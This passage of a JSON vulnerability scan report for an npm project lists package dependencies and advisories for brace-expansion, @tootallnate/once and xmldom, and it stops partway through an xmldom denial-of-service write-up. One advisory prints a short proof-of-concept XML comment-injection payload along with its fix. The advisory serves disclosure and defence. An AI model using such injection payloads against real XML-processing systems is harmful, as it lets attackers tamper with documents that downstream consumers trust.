}, { "ID": "http-proxy-agent@4.0.1", "Name": "http-proxy-agent", "Identifier": { "PURL": "pkg:npm/http-proxy-agent@4.0.1", "UID": "356f3325bfd18cd6" }, "Version": "4.0.1", "Licenses": [ "MIT" ], "DependsOn": [ "@tootallnate/once@1.1.2", "agent-base@6.0.2", "debug@4.4.3" ], "Locations": [ { "StartLine": 5913, "EndLine": 5920 } ], "AnalyzedBy": "yarn" }, { "ID": "https-proxy-agent@5.0.1", "Name": "https-proxy-agent", "Identifier": { "PURL": "pkg:npm/https-proxy-agent@5.0.1", "UID": "54ea7a040b759ec5" }, "Version": "5.0.1", "Licenses": [ "MIT" ], "DependsOn": [ "agent-base@6.0.2", "debug@4.4.3" ], "Locations": [ { "StartLine": 5930, "EndLine": 5936 } ], "AnalyzedBy": "yarn" }, { "ID": "humanize-ms@1.2.1", "Name": "humanize-ms", "Identifier": { "PURL": "pkg:npm/humanize-ms@1.2.1", "UID": "23a7e4fb7735aa94" }, "Version": "1.2.1", "Licenses": [ "MIT" ], "DependsOn": [ "ms@2.1.3" ], "Locations": [ { "StartLine": 5959, "EndLine": 5964 } ], "AnalyzedBy": "yarn" }, { "ID": "infer-owner@1.0.4", "Name": "infer-owner", "Identifier": { "PURL": "pkg:npm/infer-owner@1.0.4", "UID": "fe4f5e75ad65b18f" }, "Version": "1.0.4", "Licenses": [ "ISC" ], "Locations": [ { "StartLine": 6040, "EndLine": 6043 } ], "AnalyzedBy": "yarn" }, { "ID": "is-lambda@1.0.1", "Name": "is-lambda", "Identifier": { "PURL": "pkg:npm/is-lambda@1.0.1", "UID": "ade253a654ff58ee" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Locations": [ { "StartLine": 6255, "EndLine": 6258 } ], "AnalyzedBy": "yarn" }, { "ID": "make-fetch-happen@9.1.0", "Name": "make-fetch-happen", "Identifier": { "PURL": "pkg:npm/make-fetch-happen@9.1.0", "UID": "e3e073f9016fc66" }, "Version": "9.1.0", "Licenses": [ "ISC" ], "DependsOn": [ "agentkeepalive@4.6.0", "cacache@15.3.0", "http-cache-semantics@4.2.0", "http-proxy-agent@4.0.1", "https-proxy-agent@5.0.1", "is-lambda@1.0.1", "lru-cache@6.0.0", "minipass@3.3.6", "minipass-collect@1.0.2", "minipass-fetch@1.4.1", "minipass-flush@1.0.5", "minipass-pipeline@1.2.4", "negotiator@0.6.4", "promise-retry@2.0.1", "socks-proxy-agent@6.2.1", "ssri@8.0.1" ], "Locations": [ { "StartLine": 7302, "EndLine": 7322 } ], "AnalyzedBy": "yarn" }, { "ID": "minipass@5.0.0", "Name": "minipass", "Identifier": { "PURL": "pkg:npm/minipass@5.0.0", "UID": "7108929cc786d8ff" }, "Version": "5.0.0", "Licenses": [ "ISC" ], "Locations": [ { "StartLine": 7829, "EndLine": 7832 } ], "AnalyzedBy": "yarn" }, { "ID": "minipass-collect@1.0.2", "Name": "minipass-collect", "Identifier": { "PURL": "pkg:npm/minipass-collect@1.0.2", "UID": "bc70745f3a4e9cad" }, "Version": "1.0.2", "Licenses": [ "ISC" ], "DependsOn": [ "minipass@3.3.6" ], "Locations": [ { "StartLine": 7736, "EndLine": 7741 } ], "AnalyzedBy": "yarn" }, { "ID": "minipass-fetch@1.4.1", "Name": "minipass-fetch", "Identifier": { "PURL": "pkg:npm/minipass-fetch@1.4.1", "UID": "7326f59cae7c8f2e" }, "Version": "1.4.1", "Licenses": [ "MIT" ], "DependsOn": [ "minipass@3.3.6", "minipass-sized@1.0.3", "minizlib@2.1.2" ], "Locations": [ { "StartLine": 7750, "EndLine": 7759 } ], "AnalyzedBy": "yarn" }, { "ID": "minizlib@2.1.2", "Name": "minizlib", "Identifier": { "PURL": "pkg:npm/minizlib@2.1.2", "UID": "eeff86540ebe0b5" }, "Version": "2.1.2", "Licenses": [ "MIT" ], "DependsOn": [ "minipass@3.3.6", "yallist@4.0.0" ], "Locations": [ { "StartLine": 7834, "EndLine": 7840 } ], "AnalyzedBy": "yarn" }, { "ID": "node-addon-api@7.1.1", "Name": "node-addon-api", "Identifier": { "PURL": "pkg:npm/node-addon-api@7.1.1", "UID": "f8ceef8ff57628ca" }, "Version": "7.1.1", "Licenses": [ "MIT" ], "Locations": [ { "StartLine": 7932, "EndLine": 7935 } ], "AnalyzedBy": "yarn" }, { "ID": "node-gyp@8.4.1", "Name": "node-gyp", "Identifier": { "PURL": "pkg:npm/node-gyp@8.4.1", "UID": "f194ed5305db0814" }, "Version": "8.4.1", "Licenses": [ "MIT" ], "DependsOn": [ "env-paths@2.2.1", "glob@7.2.3", "graceful-fs@4.2.11", "make-fetch-happen@9.1.0", "nopt@5.0.0", "npmlog@6.0.2", "rimraf@3.0.2", "semver@7.7.3", "tar@6.2.1", "which@2.0.2" ], "Locations": [ { "StartLine": 7959, "EndLine": 7973 } ], "AnalyzedBy": "yarn" }, { "ID": "nopt@5.0.0", "Name": "nopt", "Identifier": { "PURL": "pkg:npm/nopt@5.0.0", "UID": "335f30552b5a96a5" }, "Version": "5.0.0", "Licenses": [ "ISC" ], "DependsOn": [ "abbrev@1.1.1" ], "Locations": [ { "StartLine": 8003, "EndLine": 8008 } ], "AnalyzedBy": "yarn" }, { "ID": "npmlog@6.0.2", "Name": "npmlog", "Identifier": { "PURL": "pkg:npm/npmlog@6.0.2", "UID": "c8f943aaa07a0941" }, "Version": "6.0.2", "Licenses": [ "ISC" ], "DependsOn": [ "are-we-there-yet@3.0.1", "console-control-strings@1.1.0", "gauge@4.0.4", "set-blocking@2.0.0" ], "Locations": [ { "StartLine": 8187, "EndLine": 8195 } ], "AnalyzedBy": "yarn" }, { "ID": "p-map@4.0.0", "Name": "p-map", "Identifier": { "PURL": "pkg:npm/p-map@4.0.0", "UID": "38e15f179e0de519" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "DependsOn": [ "aggregate-error@3.1.0" ], "Locations": [ { "StartLine": 8412, "EndLine": 8417 } ], "AnalyzedBy": "yarn" }, { "ID": "promise-inflight@1.0.1", "Name": "promise-inflight", "Identifier": { "PURL": "pkg:npm/promise-inflight@1.0.1", "UID": "9f2c70aebe78916" }, "Version": "1.0.1", "Licenses": [ "ISC" ], "Locations": [ { "StartLine": 8698, "EndLine": 8701 } ], "AnalyzedBy": "yarn" }, { "ID": "socks-proxy-agent@6.2.1", "Name": "socks-proxy-agent", "Identifier": { "PURL": "pkg:npm/socks-proxy-agent@6.2.1", "UID": "e5dc075630112ec1" }, "Version": "6.2.1", "Licenses": [ "MIT" ], "DependsOn": [ "agent-base@6.0.2", "debug@4.4.3", "socks@2.8.7" ], "Locations": [ { "StartLine": 10034, "EndLine": 10041 } ], "AnalyzedBy": "yarn" }, { "ID": "sqlite3@5.1.7", "Name": "sqlite3", "Identifier": { "PURL": "pkg:npm/sqlite3@5.1.7", "UID": "62612dd9809f7b52" }, "Version": "5.1.7", "Licenses": [ "BSD-3-Clause" ], "DependsOn": [ "bindings@1.5.0", "node-addon-api@7.1.1", "prebuild-install@7.1.3", "tar@6.2.1" ], "Locations": [ { "StartLine": 10148, "EndLine": 10158 } ], "AnalyzedBy": "yarn" }, { "ID": "ssri@8.0.1", "Name": "ssri", "Identifier": { "PURL": "pkg:npm/ssri@8.0.1", "UID": "f4ec868668b12626" }, "Version": "8.0.1", "Licenses": [ "ISC" ], "DependsOn": [ "minipass@3.3.6" ], "Locations": [ { "StartLine": 10165, "EndLine": 10170 } ], "AnalyzedBy": "yarn" }, { "ID": "tar@6.2.1", "Name": "tar", "Identifier": { "PURL": "pkg:npm/tar@6.2.1", "UID": "c4ef5ba6cdfac8c6" }, "Version": "6.2.1", "Licenses": [ "ISC" ], "DependsOn": [ "chownr@2.0.0", "fs-minipass@2.1.0", "minipass@5.0.0", "minizlib@2.1.2", "mkdirp@1.0.4", "yallist@4.0.0" ], "Locations": [ { "StartLine": 10536, "EndLine": 10546 } ], "AnalyzedBy": "yarn" }, { "ID": "unique-filename@1.1.1", "Name": "unique-filename", "Identifier": { "PURL": "pkg:npm/unique-filename@1.1.1", "UID": "13521e138de66b3d" }, "Version": "1.1.1", "Licenses": [ "ISC" ], "DependsOn": [ "unique-slug@2.0.2" ], "Locations": [ { "StartLine": 10849, "EndLine": 10854 } ], "AnalyzedBy": "yarn" }, { "ID": "unique-slug@2.0.2", "Name": "unique-slug", "Identifier": { "PURL": "pkg:npm/unique-slug@2.0.2", "UID": "95e6bbfc76b8bb62" }, "Version": "2.0.2", "Licenses": [ "ISC" ], "DependsOn": [ "imurmurhash@0.1.4" ], "Locations": [ { "StartLine": 10861, "EndLine": 10866 } ], "AnalyzedBy": "yarn" } ], "Vulnerabilities": [ { "VulnerabilityID": "CVE-2026-25547", "VendorIDs": [ "GHSA-7h2j-956f-4vf2" ], "PkgID": "@isaacs/brace-expansion@5.0.0", "PkgName": "@isaacs/brace-expansion", "PkgIdentifier": { "PURL": "pkg:npm/%40isaacs/brace-expansion@5.0.0", "UID": "885a889e7cdb5828" }, "InstalledVersion": "5.0.0", "FixedVersion": "5.0.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-25547", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:01da549f9dd0e9f129f3f310d476309a104cbe82146ac22ff3fda1c9158ac472", "Title": "brace-expansion: brace-expansion: Denial of Service via unbounded brace range expansion", "Description": "@isaacs/brace-expansion is a hybrid CJS/ESM TypeScript fork of brace-expansion. Prior to version 5.0.1, @isaacs/brace-expansion is vulnerable to a denial of service (DoS) issue caused by unbounded brace range expansion. When an attacker provides a pattern containing repeated numeric brace ranges, the library attempts to eagerly generate every possible combination synchronously. Because the expansion grows exponentially, even a small input can consume excessive CPU and memory and may crash the Node.js process. This issue has been patched in version 5.0.1.", "Severity": "HIGH", "CweIDs": [ "CWE-1333" ], "VendorSeverity": { "alma": 3, "ghsa": 3, "oracle-oval": 3, "redhat": 2, "rocky": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V40Score": 8.7 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/errata/RHSA-2026:7350", "https://access.redhat.com/security/cve/CVE-2026-25547", "https://bugzilla.redhat.com/2431340", "https://bugzilla.redhat.com/2436942", "https://bugzilla.redhat.com/2441268", "https://bugzilla.redhat.com/2447140", "https://bugzilla.redhat.com/2447141", "https://bugzilla.redhat.com/2447142", "https://bugzilla.redhat.com/2447143", "https://bugzilla.redhat.com/2447144", "https://bugzilla.redhat.com/2447145", "https://bugzilla.redhat.com/2448754", "https://bugzilla.redhat.com/2453037", "https://bugzilla.redhat.com/2453151", "https://bugzilla.redhat.com/2453152", "https://bugzilla.redhat.com/2453157", "https://bugzilla.redhat.com/2453158", "https://bugzilla.redhat.com/2453160", "https://bugzilla.redhat.com/2453161", "https://bugzilla.redhat.com/2453162", "https://bugzilla.redhat.com/show_bug.cgi?id=2431340", "https://bugzilla.redhat.com/show_bug.cgi?id=2436942", "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", "https://bugzilla.redhat.com/show_bug.cgi?id=2447140", "https://bugzilla.redhat.com/show_bug.cgi?id=2447141", "https://bugzilla.redhat.com/show_bug.cgi?id=2447142", "https://bugzilla.redhat.com/show_bug.cgi?id=2447143", "https://bugzilla.redhat.com/show_bug.cgi?id=2447144", "https://bugzilla.redhat.com/show_bug.cgi?id=2447145", "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", "https://bugzilla.redhat.com/show_bug.cgi?id=2453037", "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", "https://bugzilla.redhat.com/show_bug.cgi?id=2453152", "https://bugzilla.redhat.com/show_bug.cgi?id=2453157", "https://bugzilla.redhat.com/show_bug.cgi?id=2453158", "https://bugzilla.redhat.com/show_bug.cgi?id=2453160", "https://bugzilla.redhat.com/show_bug.cgi?id=2453161", "https://bugzilla.redhat.com/show_bug.cgi?id=2453162", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1525", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1526", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1527", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1528", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21637", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21711", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21712", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21713", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21714", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21715", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21716", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21717", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2229", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25547", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2581", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", "https://errata.almalinux.org/9/ALSA-2026-7350.html", "https://errata.rockylinux.org/RLSA-2026:7350", "https://github.com/isaacs/brace-expansion", "https://github.com/isaacs/brace-expansion/security/advisories/GHSA-7h2j-956f-4vf2", "https://linux.oracle.com/cve/CVE-2026-25547.html", "https://linux.oracle.com/errata/ELSA-2026-7675.html", "https://nvd.nist.gov/vuln/detail/CVE-2026-25547", "https://www.cve.org/CVERecord?id=CVE-2026-25547" ], "PublishedDate": "2026-02-04T22:16:00.813Z", "LastModifiedDate": "2026-04-15T00:35:42.02Z" }, { "VulnerabilityID": "CVE-2026-3449", "VendorIDs": [ "GHSA-vpq2-c234-7xj6" ], "PkgID": "@tootallnate/once@1.1.2", "PkgName": "@tootallnate/once", "PkgIdentifier": { "PURL": "pkg:npm/%40tootallnate/once@1.1.2", "UID": "a9c0266fb34361f" }, "InstalledVersion": "1.1.2", "FixedVersion": "3.0.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-3449", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:71441370e0dee1ebd49c5f3160dbc1c12c12c79fce53da2deb8439b1424f7e67", "Title": "@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect control flow scoping with AbortSignal", "Description": "Versions of the package @tootallnate/once before 3.0.1 are vulnerable to Incorrect Control Flow Scoping in promise resolving when AbortSignal option is used. The Promise remains in a permanently pending state after the signal is aborted, causing any await or .then() usage to hang indefinitely. This can cause a control-flow leak that can lead to stalled requests, blocked workers, or degraded application availability.", "Severity": "LOW", "CweIDs": [ "CWE-705" ], "VendorSeverity": { "ghsa": 1, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P", "V3Score": 3.3, "V40Score": 1.9 }, "redhat": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 4 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-3449", "https://github.com/TooTallNate/once", "https://github.com/TooTallNate/once/commit/b9f43cc5259bee2952d91ad3cdbd201a82df448a", "https://github.com/TooTallNate/once/issues/8", "https://nvd.nist.gov/vuln/detail/CVE-2026-3449", "https://security.snyk.io/vuln/SNYK-JS-TOOTALLNATEONCE-15250612", "https://www.cve.org/CVERecord?id=CVE-2026-3449" ], "PublishedDate": "2026-03-03T05:17:25.017Z", "LastModifiedDate": "2026-03-03T21:52:29.877Z" }, { "VulnerabilityID": "CVE-2026-34601", "VendorIDs": [ "GHSA-wh4c-j3r5-mjhp" ], "PkgID": "@xmldom/xmldom@0.8.11", "PkgName": "@xmldom/xmldom", "PkgIdentifier": { "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", "UID": "df38f0b8448f89b9" }, "InstalledVersion": "0.8.11", "FixedVersion": "0.8.12, 0.9.9", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-34601", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:9e314e5d3d2085fb58956e52293e9b59a19926fae15ccf8c8a906d6e54481e86", "Title": "xmldom: xmldom: XML structure injection via CDATA terminator", "Description": "xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) `DOMParser` and `XMLSerializer` module. In xmldom versions 0.6.0 and prior and @xmldom/xmldom prior to versions 0.8.12 and 0.9.9, xmldom/xmldom allows attacker-controlled strings containing the CDATA terminator ]]\u003e to be inserted into a CDATASection node. During serialization, XMLSerializer emitted the CDATA content verbatim without rejecting or safely splitting the terminator. As a result, data intended to remain text-only became active XML markup in the serialized output, enabling XML structure injection and downstream business-logic manipulation. This issue has been patched in xmldom version 0.6.0 and @xmldom/xmldom versions 0.8.12 and 0.9.9.", "Severity": "HIGH", "CweIDs": [ "CWE-91" ], "VendorSeverity": { "ghsa": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-34601", "https://github.com/xmldom/xmldom", "https://github.com/xmldom/xmldom/commit/2b852e836ab86dbbd6cbaf0537f584dd0b5ac184", "https://github.com/xmldom/xmldom/releases/tag/0.8.12", "https://github.com/xmldom/xmldom/releases/tag/0.9.9", "https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp", "https://nvd.nist.gov/vuln/detail/CVE-2026-34601", "https://www.cve.org/CVERecord?id=CVE-2026-34601" ], "PublishedDate": "2026-04-02T18:16:31.933Z", "LastModifiedDate": "2026-04-16T14:57:08.337Z" }, { "VulnerabilityID": "CVE-2026-41672", "VendorIDs": [ "GHSA-j759-j44w-7fr8" ], "PkgID": "@xmldom/xmldom@0.8.11", "PkgName": "@xmldom/xmldom", "PkgIdentifier": { "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", "UID": "df38f0b8448f89b9" }, "InstalledVersion": "0.8.11", "FixedVersion": "0.8.13, 0.9.10", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41672", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:7307ca1075c073ce090122ddfc34dac830e447ab2af06088d56eeb9074fa32f4", "Title": "xmldom has XML node injection through unvalidated comment serialization", "Description": "## Summary\n\nThe package allows attacker-controlled comment content to be serialized into XML without validating or neutralizing comment breaking sequences. As a result, an attacker can terminate the comment early and inject arbitrary XML nodes into the serialized output.\n\n---\n\n## Details\n\nThe issue is in the DOM construction and serialization flow for comment nodes.\n\nWhen `createComment(data)` is called, the supplied string is stored as comment data through the generic character-data handling path. That content is kept as-is. Later, when the document is serialized, the serializer writes comment nodes by concatenating the XML comment delimiters with the stored `node.data` value directly.\n\nThat behavior is unsafe because XML comments are a syntax-sensitive context. If attacker-controlled input contains a sequence that closes the comment, the serializer does not preserve it as literal comment text. Instead, it emits output where the remainder of the payload is treated as live XML markup.\n\nThis is a real injection bug, not a formatting issue. The serializer already applies context-aware handling in other places, such as escaping text nodes and rewriting unsafe CDATA terminators. Comment content does not receive equivalent treatment. Because of that gap, untrusted data can break out of the comment boundary and modify the structure of the final XML document.\n\n---\n\n## PoC\n\n```js\nconst { DOMImplementation, DOMParser, XMLSerializer } = require('@xmldom/xmldom');\n\nconst doc = new DOMImplementation().createDocument(null, 'root', null);\n\ndoc.documentElement.appendChild(\n doc.createComment('--\u003e\u003cinjected attr=\"1\"/\u003e\u003c!--')\n);\n\nconst xml = new XMLSerializer().serializeToString(doc);\nconsole.log(xml);\n// \u003croot\u003e\u003c!----\u003e\u003cinjected attr=\"1\"/\u003e\u003c!----\u003e\u003c/root\u003e\n\nconst reparsed = new DOMParser().parseFromString(xml, 'text/xml');\nconsole.log(reparsed.documentElement.childNodes.item(1).nodeName);\n// injected\n```\n\n---\n\n## Impact\n\nAn application that uses the package to build XML from untrusted input can be made to emit attacker-controlled elements outside the intended comment boundary. That allows the attacker to alter the meaning and structure of generated XML documents.\n\nIn practice, this can affect any workflow that generates XML and then stores it, forwards it, signs it, or hands it to another parser. Realistic targets include XML-based configuration, policy documents, and message formats where downstream consumers trust the serialized structure.\n\n---\n\n## Disclosure\n\nThis vulnerability was publicly disclosed at 2026-04-06T11:25:07Z via [xmldom/xmldom#987](https://github.com/xmldom/xmldom/pull/987), which was subsequently closed without being merged.\n\n---\n\n## Fix Applied\n\n\u003e **⚠ Opt-in required.** Protection is not automatic. Existing serialization calls remain\n\u003e vulnerable unless `{ requireWellFormed: true }` is explicitly passed. Applications that pass\n\u003e untrusted data to `createComment()` or mutate comment nodes with untrusted input (via\n\u003e `appendData`, `insertData`, `replaceData`, `.data =`, or `.textContent =`) should audit all\n\u003e `serializeToString()` call sites and add the option.\n\n`XMLSerializer.serializeToString()` now accepts an options object as a second argument. When `{ requireWellFormed: true }` is passed, the serializer throws `InvalidStateError` before emitting a Comment node whose `.data` would produce malformed XML.\n\nOn `@xmldom/xmldom` ≥ 0.9.10, the full W3C DOM Parsing §3.2.1.4 check is applied: throws if `.data` contains `--` anywhere, ends with `-`, or contains characters outside the XML Char production.\n\nOn `@xmldom/xmldom` ≥ 0.8.13 (LTS), only the `--\u003e` injection sequence is checked. The `0.8.x` SAX parser accepts comments containing `--` (without `\u003e`), so throwing on bare `--` would break a previously-working round-trip on that branch. The `--\u003e` check is sufficient to prevent injection.\n\n### PoC — fixed path\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst doc = new DOMImplementation().createDocument(null, 'root', null);\ndoc.documentElement.appendChild(doc.createComment('--\u003e\u003cinjected attr=\"1\"/\u003e\u003c!--'));\n\n// Default (unchanged): verbatim — injection present\nconst unsafe = new XMLSerializer().serializeToString(doc);\nconsole.log(unsafe);\n// \u003croot\u003e\u003c!----\u003e\u003cinjected attr=\"1\"/\u003e\u003c!----\u003e\u003c/root\u003e\n\n// Opt-in guard: throws InvalidStateError before serializing\ntry {\n new XMLSerializer().serializeToString(doc, { requireWellFormed: true });\n} catch (e) {\n console.log(e.name, e.message);\n // InvalidStateError: The comment node data contains \"--\" or ends with \"-\" (0.9.x)\n // InvalidStateError: The comment node data contains \"--\u003e\" (0.8.x — only --\u003e is checked)\n}\n```\n\n### Why the default stays verbatim\n\nThe W3C DOM Parsing and Serialization spec §3.2.1.4 defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the spec explicitly permits serializing ill-formed comment content verbatim — this is also the behavior of browser implementations (Chrome, Firefox, Safari): `new XMLSerializer().serializeToString(doc)` produces the injection sequence without error in all major browsers.\n\nUnconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in `requireWellFormed: true` flag allows applications that require injection safety to enable strict mode without breaking existing deployments.\n\n### Residual limitation\n\nThe fix operates at serialization time only. There is no creation-time check in `createComment` — the spec does not require one for comment data. Any path that leads to a Comment node with `--` in its data (`createComment`, `appendData`, `.data =`, etc.) produces a node that serializes safely only when `{ requireWellFormed: true }` is passed to `serializeToString`.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", "V40Score": 8.7 } }, "References": [ "https://github.com/xmldom/xmldom", "https://github.com/xmldom/xmldom/commit/b397540889086da868c30c366ad5c220d1a750c7", "https://github.com/xmldom/xmldom/commit/fda7cc313de30243fea35cada64e0bb12099c2a1", "https://github.com/xmldom/xmldom/pull/987", "https://github.com/xmldom/xmldom/releases/tag/0.8.13", "https://github.com/xmldom/xmldom/releases/tag/0.9.10", "https://github.com/xmldom/xmldom/security/advisories/GHSA-j759-j44w-7fr8" ] }, { "VulnerabilityID": "CVE-2026-41673", "VendorIDs": [ "GHSA-2v35-w6hq-6mfw" ], "PkgID": "@xmldom/xmldom@0.8.11", "PkgName": "@xmldom/xmldom", "PkgIdentifier": { "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", "UID": "df38f0b8448f89b9" }, "InstalledVersion": "0.8.11", "FixedVersion": "0.8.13, 0.9.10", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41673", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:dc7144040ebacb87c6a4442ab91b3294453ad09d7176cd1190f3b81bd509e63d", "Title": "xmldom: Uncontrolled recursion in XML serialization leads to DoS", "Description": "## Summary\n\nSeven recursive traversals in `lib/dom.js` operate without a depth limit. A sufficiently deeply\nnested DOM tree causes a `RangeError: Maximum call stack size exceeded`, crashing the application.\n\n**Reported operations:**\n- `Node.prototype.normalize()` — reported by @praveen-kv (email 2026-04-05) and @KarimTantawey (GHSA-fwmp-8wwc-qhv6, via `DOMParser.parseFromString()`)\n- `XMLSerializer.serializeToString()` — reported by @Jvr2022 (GHSA-2v35-w6hq-6mfw) and @KarimTantawey (GHSA-j2hf-fqwf-rrjf)\n\n**Additionally, discovered in research:**\n- `Element.getElementsByTagName()` / `getElementsByTagNameNS()` / `getElementsByClassName()` / `getElementById()`\n- `Node.cloneNode(true)`\n- `Document.importNode(node, true)`\n- `node.textContent` (getter)\n- `Node.isEqualNode(other)`\n\nAll seven share the same root cause: pure-JavaScript recursive tree traversal with no depth guard.\nA single deeply nested document (parsed successfully) triggers any or all of these operations.\n\n---\n\n## Details\n\n### Root cause\n\n`lib/dom.js` implements DOM tree traversals as depth-first recursive functions. Each level of\nelement nesting adds one JavaScript call frame. The JS engine's call stack is finite; once\nexhausted, a `RangeError: Maximum call stack size exceeded` is thrown. This error may not be\ncaught reliably at stack-exhaustion depths because the catch handler itself requires stack\nframes to execute — especially in async scenarios, where an uncaught `RangeError` inside a\ncallback or promise chain can crash the entire Node.js process.\n\nParsing a deeply nested document **succeeds** — the SAX parser in `lib/sax.js` is iterative.\nThe crash occurs during subsequent operations on the parsed DOM.\n\n### `Node.prototype.normalize()` — reported by @praveen-kv\n\n[`lib/dom.js:1296–1308`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L1296-L1308) (main):\n\n```js\nnormalize: function () {\n var child = this.firstChild;\n while (child) {\n var next = child.nextSibling;\n if (next \u0026\u0026 next.nodeType == TEXT_NODE \u0026\u0026 child.nodeType == TEXT_NODE) {\n this.removeChild(next);\n child.appendData(next.data);\n } else {\n child.normalize(); // recursive call — no depth guard\n child = next;\n }\n }\n},\n```\n\nCrash threshold (Node.js 18, default stack): ~10,000 levels.\n\n### `XMLSerializer.serializeToString()` — reported by @Jvr2022\n\n[`lib/dom.js:2790–2974`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L2790-L2974) (main):\nThe internal `serializeToString` worker recurses into child nodes at four call sites, each\npassing a `visibleNamespaces.slice()` copy. The per-frame allocation causes earlier stack\nexhaustion than `normalize()`.\n\nCrash threshold (Node.js 18, default stack): ~5,000 levels.\n\n### Additional recursive entry points\n\nAll five crash at ~10,000 levels on Node.js 18.\n\n| Function | Definition | Public API entry point(s) | Crash depth (Node.js 18) |\n|-----------------------------|----------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------|--------------------------|\n| `_visitNode` | [`lib/dom.js:1529`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L1529) | `getElementsByTagName()`, `getElementsByTagNameNS()`, `getElementsByClassName()`, `getElementById()` | ~10,000 levels |\n| `cloneNode` (module fn) | [`lib/dom.js:3037`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L3037) | `Node.prototype.cloneNode(true)` | ~10,000 levels |\n| `importNode` (module fn) | [`lib/dom.js:2975`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L2975) | `Document.prototype.importNode(node, true)` | ~10,000 levels |\n| `getTextContent` (inner fn) | [`lib/dom.js:3130`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L3130) | `node.textContent` (getter) | ~10,000 levels |\n| 